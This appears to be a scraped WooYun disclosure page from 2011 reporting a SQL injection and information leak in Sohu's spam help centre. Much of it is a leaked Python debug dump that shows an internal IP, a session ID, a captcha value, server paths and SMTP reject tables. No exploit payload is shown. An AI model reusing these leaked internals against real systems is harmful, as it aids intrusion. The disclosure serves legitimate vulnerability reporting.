'CBIP': ' \xe7\x94\xb1\xe4\xba\x8eIP\xe5\x8f\x91\xe9\x80\x81\xe7\x96\x91\xe4\xbc\xbc\xe5\x9e\x83\xe5\x9c\xbe\xe9\x82\xae\xe4\xbb\xb6\xe8\xa2\xab\xe6\x8b\x92\xe7\x9a\x84\xe6\xac\xa1\xe6\x95\xb0\xe8\xbe\xbe\xe5\x88\xb0\xe4\xb8\x8a\xe9\x99\x90\xe8\x80\x8c\xe8\xbf\x9b\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'CBSENDER': ' \xe7\x94\xb1\xe4\xba\x8e\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x8f\x91\xe9\x80\x81\xe7\x96\x91\xe4\xbc\xbc\xe5\x9e\x83\xe5\x9c\xbe\xe9\x82\xae\xe4\xbb\xb6\xe8\xa2\xab\xe6\x8b\x92\xe7\x9a\x84\xe6\xac\xa1\xe6\x95\xb0\xe8\xbe\xbe\xe5\x88\xb0\xe4\xb8\x8a\xe9\x99\x90\xe8\x80\x8c\xe8\xbf\x9b\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'DELIPFRMB': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe4\xbb\x8e\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95\xe4\xb8\xad\xe5\xb0\x86\xe5\x85\xb6\xe8\xa7\xa3\xe9\x99\xa4',
'DELIPFRMW': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe4\xbb\x8e\xe7\x99\xbd\xe5\x90\x8d\xe5\x8d\x95\xe4\xb8\xad\xe5\xb0\x86\xe5\x85\xb6\xe8\xa7\xa3\xe9\x99\xa4',
'DELRCPTFRMR': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe4\xbb\x8e\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95\xe5\xb0\x86\xe5\x85\xb6\xe8\xa7\xa3\xe9\x99\xa4',
'DELSENDERFRMB': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe4\xbb\x8e\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95\xe4\xb8\xad\xe5\xb0\x86\xe5\x85\xb6\xe8\xa7\xa3\xe9\x99\xa4',
'DELSENDERFRMW': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe4\xbb\x8e\xe7\x99\xbd\xe5\x90\x8d\xe5\x8d\x95\xe4\xb8\xad\xe5\xb0\x86\xe5\x85\xb6\xe8\xa7\xa3\xe9\x99\xa4',
'HBIP': ' \xe7\x94\xb1\xe4\xba\x8eIP\xe5\x81\x87\xe5\x86\x92\xe9\x82\xae\xe4\xbb\xb6\xe6\x9c\x8d\xe5\x8a\xa1\xe5\x95\x86\xe5\x8f\x91\xe4\xbf\xa1\xe8\x80\x8c\xe8\xa2\xab\xe6\x8b\x92\xe7\x9a\x84\xe6\xac\xa1\xe6\x95\xb0\xe8\xbe\xbe\xe5\x88\xb0\xe4\xb8\x8a\xe9\x99\x90\xe8\x80\x8c\xe8\xbf\x9b\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'OKIP': ' \xe7\x94\xb1\xe4\xba\x8eIP\xe5\x8f\x91\xe9\x80\x81\xe9\x82\xae\xe4\xbb\xb6\xe6\x95\xb0\xe9\x87\x8f\xe8\xbf\x87\xe5\xa4\x9a\xe6\x88\x96\xe8\xbf\x87\xe4\xba\x8e\xe9\xa2\x91\xe7\xb9\x81\xe8\xbe\xbe\xe5\x88\xb0\xe4\xb8\x8a\xe9\x99\x90\xe8\x80\x8c\xe8\xbf\x9b\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'OKSENDER': ' \xe7\x94\xb1\xe4\xba\x8e\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x8f\x91\xe9\x80\x81\xe9\x82\xae\xe4\xbb\xb6\xe6\x95\xb0\xe9\x87\x8f\xe8\xbf\x87\xe5\xa4\x9a\xe6\x88\x96\xe8\xbf\x87\xe4\xba\x8e\xe9\xa2\x91\xe7\xb9\x81\xe8\xbe\xbe\xe5\x88\xb0\xe4\xb8\x8a\xe9\x99\x90\xe8\x80\x8c\xe8\xbf\x9b\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'RBSENDER': ' \xe7\x94\xb1\xe4\xba\x8e\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x8f\x91\xe9\x80\x81\xe7\xbb\x99\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95\xe7\x94\xa8\xe6\x88\xb7\xe9\x82\xae\xe4\xbb\xb6\xe6\x95\xb0\xe9\x87\x8f\xe8\xbf\x87\xe5\xa4\x9a\xe8\xbe\xbe\xe5\x88\xb0\xe4\xb8\x8a\xe9\x99\x90\xe8\x80\x8c\xe8\xbf\x9b\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'SBSENDER': ' \xe7\x94\xb1\xe4\xba\x8e\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\xb7\xb2\xe7\xbb\x8f\xe5\x9c\xa8\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95\xe4\xb8\xad\xe8\xbf\x98\xe7\xbb\xa7\xe7\xbb\xad\xe5\x
1000
8f\x91\xe4\xbf\xa1,\xe8\xa2\xab\xe6\x8b\x92\xe6\xac\xa1\xe6\x95\xb0\xe8\xbe\xbe\xe5\x88\xb0\xe4\xb8\x8a\xe9\x99\x90\xe8\x80\x8c\xe8\xbf\x9b\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'UNIP': ' \xe7\x94\xb1\xe4\xba\x8eIP\xe5\x8f\x91\xe9\x80\x81\xe9\x82\xae\xe4\xbb\xb6\xe7\xbb\x99\xe4\xb8\x8d\xe5\xad\x98\xe5\x9c\xa8\xe7\x94\xa8\xe6\x88\xb7\xe8\x80\x8c\xe8\xa2\xab\xe6\x8b\x92\xe6\xac\xa1\xe6\x95\xb0\xe8\xbf\x87\xe5\xa4\x9a\xe8\xbe\xbe\xe5\x88\xb0\xe4\xb8\x8a\xe9\x99\x90\xe8\x80\x8c\xe8\xbf\x9b\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'UNSENDER': ' \xe7\x94\xb1\xe4\xba\x8e\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x8f\x91\xe9\x80\x81\xe9\x82\xae\xe4\xbb\xb6\xe7\xbb\x99\xe4\xb8\x8d\xe5\xad\x98\xe5\x9c\xa8\xe7\x94\xa8\xe6\x88\xb7\xe8\x80\x8c\xe8\xa2\xab\xe6\x8b\x92\xe6\xac\xa1\xe6\x95\xb0\xe8\xbf\x87\xe5\xa4\x9a\xe8\xbe\xbe\xe5\x88\xb0\xe4\xb8\x8a\xe9\x99\x90\xe8\x80\x8c\xe8\xbf\x9b\xe5\x85\xa5\xe9\xbb\x91\xe5\x90\x8d\xe5\x8d\x95',
'WHITEIP': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe5\xb0\x86\xe5\xae\x83\xe5\x8a\xa0\xe5\x85\xa5\xe7\x99\xbd\xe5\x90\x8d\xe5\x8d\x95',
'WHITESENDER': ' \xe7\xae\xa1\xe7\x90\x86\xe4\xba\xba\xe5\x91\x98\xe5\xb0\x86\xe5\xae\x83\xe5\x8a\xa0\xe5\x85\xa5\xe7\x99\xbd\xe5\x90\x8d\xe5\x8d\x95'},
'rule': <class code.rule at 0x2ad35d9fcdd0>,
'session': <Storage {'ip': u'10.10.71.25', 'session_id': '1a2ca39db8c3900055e5de9437bbff98e7272114', 'captcha': 'science'}>,
'simplejson': <module 'simplejson' from '/opt/sohumc/lib/python2.6/site-packages/simplejson-1.9.2-py2.6-linux-x86_64.egg/simplejson/__init__.pyc'>,
'sitepage': <class code.sitepage at 0x2ad35d9fcd10>,
'smtp_reject': [('1',
'450 4.1.8',
'\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe8\xa2\xab\xe6\x8b\x92',
'\xe8\xaf\xb7\xe6\xa3\x80\xe6\x9f\xa5\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x9c\xb0\xe5\x9d\x80'),
('2',
'554 5.7.1',
'\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe8\xa2\xab\xe6\x8b\x92',
'\xe8\xaf\xb7\xe6\xa3\x80\xe6\x9f\xa5\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x9c\xb0\xe5\x9d\x80'),
('3',
'504 5.5.2',
'\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe8\xa2\xab\xe6\x8b\x92',
'\xe8\xaf\xb7\xe6\xa3\x80\xe6\x9f\xa5\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x9c\xb0\xe5\x9d\x80'),
('4',
'550 5.1.1',
'\xe6\x8e\xa5\xe6\x94\xb6\xe4\xba\xba\xe8\xa2\xab\xe6\x8b\x92',
'\xe8\xaf\xb7\xe6\xa3\x80\xe6\x9f\xa5\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba\xe5\x9c\xb0\xe5\x9d\x80'),
('5',
'554 5.7.1',
'\xe6\x8e\xa5\xe6\x94\xb6\xe4\xba\xba\xe8\xa2\xab\xe6\x8b\x92',
'\xe8\xaf\xb7\xe6\xa3\x80\xe6\x9f\xa5\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba\xe5\x9c\xb0\xe5\x9d\x80'),
('6',
'450 4.1.8',
'\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe8\xa2\xab\xe6\x8b\x92',
'\xe8\xaf\xb7\xe6\x9f\xa5\xe7\x9c\x8bDNS\xe9\x85\x8d\xe7\xbd\xae'),
('7',
'552 5.3.4',
'\xe9\x82\xae\xe4\xbb\xb6\xe5\xa4\xa7\xe5\xb0\x8f\xe8\xb6\x85\xe9\x99\x90',
'\xe8\xaf\xb7\xe5\x87\x8f\xe5\xb0\x8f\xe9\x82\xae\xe4\xbb\xb6\xe7\x9a\x84\xe5\xa4\xa7\xe5\xb0\x8f'),
('8',
'503 5.5.0',
'\xe8\xbf\x9e\xe6\x8e\xa5\xe8\xa2\xab\xe6\x8b\x92',
'\xe9\x81\xb5\xe5\xae\x88\xe5\x8d\x8f\xe8\xa
1000
e\xae\xe8\xa7\x84\xe5\x88\x99'),
('9',
'553 5.7.0',
'IP\xe5\x9c\xb0\xe5\x9d\x80\xe8\xa2\xab\xe6\x8b\x92',
'\xe5\x81\x9c\xe6\xad\xa2\xe5\x8f\x91\xe4\xbf\xa1,\xe7\xad\x89\xe5\xbe\x85\xe5\x85\xb6\xe8\xa7\xa3\xe7\xa6\x81'),
('10',
'553 5.7.1',
'\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe8\xa2\xab\xe6\x8b\x92',
'\xe5\x81\x9c\xe6\xad\xa2\xe5\x8f\x91\xe4\xbf\xa1,\xe7\xad\x89\xe5\x85\xb6\xe8\xa7\xa3\xe7\xa6\x81'),
('11',
'553 5.7.2',
'\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba\xe8\xa2\xab\xe6\x8b\x92',
'\xe8\x81\x94\xe7\xb3\xbb\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba\xe4\xbf\xae\xe6\x94\xb9\xe9\x82\xae\xe7\xae\xb1\xe9\x85\x8d\xe7\xbd\xae'),
('12',
'553 5.7.3',
'\xe5\x86\x85\xe5\xae\xb9\xe8\xa2\xab\xe6\x8b\x92',
'\xe5\x81\x9c\xe6\xad\xa2\xe5\x8f\x91\xe4\xbf\xa1,\xe7\xad\x89\xe5\xbe\x85\xe5\x85\xb6\xe8\xa7\xa3\xe7\xa6\x81'),
('13',
'553 5.7.4',
'IP\xe5\x9c\xb0\xe5\x9d\x80\xe8\xa2\xab\xe6\x8b\x92',
'\xe5\x81\x9c\xe6\xad\xa2\xe5\x8f\x91\xe4\xbf\xa1,\xe7\xad\x89\xe5\xbe\x85\xe5\x85\xb6\xe8\xa7\xa3\xe7\xa6\x81'),
('14',
'421 4.2.1',
'\xe4\xb8\xb4\xe6\x97\xb6\xe9\x94\x99\xe8\xaf\xaf',
'\xe9\x87\x8d\xe8\xaf\x95'),
('15',
'553 5.7.3 ',
'\xe4\xb8\x8d\xe6\x94\xaf\xe6\x8c\x81\xe9\x99\x84\xe4\xbb\xb6\xe5\x8f\x91\xe9\x80\x81',
'\xe5\x8f\x96\xe6\xb6\x88\xe9\x99\x84\xe4\xbb\xb6\xe9\x87\x8d\xe8\xaf\x95')],
'smtp_reject_info': [('1',
'450 4.1.8 <***@***>: Sender address rejected: Domain not found',
'\xe7\x94\xb1\xe4\xba\x8e\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x9c\xb0\xe5\x9d\x80\xe4\xb8\xad\xe7\x9a\x84\xe5\x9f\x9f\xe5\x90\x8d\xe6\x97\xa0\xe6\xb3\x95\xe8\xa7\xa3\xe6\x9e\x90',
'\xe8\xaf\xb7\xe5\x92\x8c\xe6\x82\xa8\xe7\x9a\x84\xe7\xbd\x91\xe7\xbb\x9c\xe7\xae\xa1\xe7\x90\x86\xe5\x91\x98\xe8\x81\x94\xe7\xb3\xbb\xef\xbc\x8c\xe8\xae\xa9\xe6\xa3\x80\xe6\x9f\xa5\xe6\x98\xaf\xe5\x90\xa6\xe7\x94\xb1\xe4\xba\x8e\xe4\xb8\x8d\xe6\xad\xa3\xe7\xa1\xae\xe7\x9a\x84 DNS \xe9\x85\x8d\xe7\xbd\xae\xe5\xaf\xbc\xe8\x87\xb4'),
('2',
'554 5.7.1 <***@***>: Sender address rejected: Access denied',
'\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x9c\xb0\xe5\x9d\x80\xe4\xb8\xad\xe7\x9a\x84\xe5\x9f\x9f\xe5\x90\x8d\xe6\x98\xaf\xe6\x90\x9c\xe7\x8b\x90\xe7\x9a\x84\xe5\x9f\x9f\xef\xbc\x8c\xe4\xbd\x86\xe7\x94\xa8\xe6\x88\xb7\xe4\xb8\x8d\xe6\x98\xaf\xe6\x90\x9c\xe7\x8b\x90\xe7\x94\xa8\xe6\x88\xb7\xef\xbc\x88\xe5\x86\x92\xe5\x85\x85\xe6\x90\x9c\xe7\x8b\x90\xe7\x94\xa8\xe6\x88\xb7\xe5\x8f\x91\xe4\xbf\xa1\xef\xbc\x89',
'\xe8\xaf\xb7\xe6\xa3\x80\xe6\x9f\xa5\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x9c\xb0\xe5\x9d\x80\xe6\x98\xaf\xe5\x90\xa6\xe6\xad\xa3\xe7\xa1\xae\xef\xbc\x8c\xe6\x88\x96\xe7\xa1\xae\xe8\xae\xa4\xe5\x9f\x9f\xe5\x90\x8d\xe5\xb7\xb2\xe7\xbb\x8f\xe4\xbb\x8e\xe6\x90\x9c\xe7\x8b\x90\xe7\x9a\x84\xe4\xbc\x81\xe4\xb8\x9a\xe5\x9f\x9f\xe4\xb8\xad\xe6\xb3\xa8\xe9\x94\x80'),
('3',
'504 5.5.2 <***>: Sender address rejected: need fully-qualified address',
'\xe5\x8f\x91\xe4\xbb\xb6\xe4\xba\xba\xe5\x9c\xb0\xe5\x9d\x80\xe4\xb9\xa6\xe5\x86\x99\xe6\xa0\xbc\xe5\xbc\x8f\xe

漏洞证明：

修复方案：

额，正确配置+正确过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2011-03-11 17:41

厂商回复：

感谢反馈, 我们马上处理.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2011-01569

漏洞标题：搜狐垃圾邮件帮助中心SQL注射漏洞及信息泄漏漏洞

相关厂商：Sohu.com

漏洞作者：路人甲

提交时间：2011-03-11 17:22

修复时间：2011-04-11 00:00

公开时间：2011-04-11 00:00

漏洞类型：SQL注射漏洞

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2011-01569

漏洞标题：搜狐垃圾邮件帮助中心SQL注射漏洞及信息泄漏漏洞

相关厂商：Sohu.com

漏洞作者： 路人甲

提交时间：2011-03-11 17:22

修复时间：2011-04-11 00:00

公开时间：2011-04-11 00:00

漏洞类型：SQL注射漏洞

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2011-01569"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云